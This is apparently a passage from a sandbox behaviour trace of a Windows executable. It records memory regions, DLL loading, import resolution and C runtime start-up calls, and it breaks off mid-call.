entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7265 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7266 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7267 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7268 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7269 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7270 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7271 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 7272 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7273 start_va = 0x5c0000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 7274 start_va = 0x290000 end_va = 0x2b9fff entry_point = 0x290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7275 start_va = 0x5c0000 end_va = 0x747fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 7276 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 7277 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7278 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7279 start_va = 0x780000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 7280 start_va = 0x910000 end_va = 0x1d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 7281 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7282 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7283 start_va = 0x1d10000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Thread: id = 868 os_tid = 0x43c [0272.491] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0272.491] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0272.491] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0272.491] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0272.492] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0272.493] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0272.494] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0272.495] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0272.496] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0272.497] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0272.497] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0272.497] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0272.497] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0272.498] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0272.498] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0272.498] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0272.498] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0272.498] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0272.498] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0272.499] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0272.499] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0272.499] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0272.499] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0272.499] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0272.499] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0272.499] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0272.500] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0272.500] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0272.500] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0272.500] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0272.500] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0272.500] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x4fe963d2, dwHighDateTime=0x1d45ac6)) [0272.500] GetCurrentThreadId () returned 0x43c [0272.500] GetCurrentProcessId () returned 0xbd4 [0272.500] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=31996258296) returned 1 [0272.500] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0272.500] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0272.500] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0272.500] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0272.500] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0272.500] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0272.501] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0272.502] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0272.503] GetCurrentThreadId () returned 0x43c [0272.503] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3d1d114f, hStdError=0x475810)) [0272.503] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0272.503] GetFileType (hFile=0x38) returned 0x2 [0272.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.503] GetFileType (hFile=0x3c) returned 0x2 [0272.503] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0272.503] GetFileType (hFile=0x40) returned 0x2 [0272.503] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0272.503] GetEnvironmentStringsW () returned 0x301e60* [0272.503] FreeEnvironmentStringsW (penv=0x301e60) returned 1 [0272.503] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0272.504] GetLastError () returned 0x0 [0272.504] SetLastError (dwErrCode=0x0) [0272.504] GetLastError () returned 0x0 [0272.504] SetLastError (dwErrCode=0x0) [0272.504] GetLastError () returned 0x0 [0272.504] SetLastError (dwErrCode=0x0) [0272.504] GetACP () returned 0x4e4 [0272.504] GetLastError () returned 0x0 [0272.504] SetLastError (dwErrCode=0x0) [0272.504] IsValidCodePage (CodePage=0x4e4) returned 1 [0272.504] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0272.504] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0272.504] GetLastError () returned 0x0 [0272.504] SetLastError (dwErrCode=0x0) [0272.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0272.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0272.504] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0272.504] GetLastError () returned 0x0 [0272.505] SetLastError (dwErrCode=0x0) [0272.505] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0272.505] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0272.505] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0272.505] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0272.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 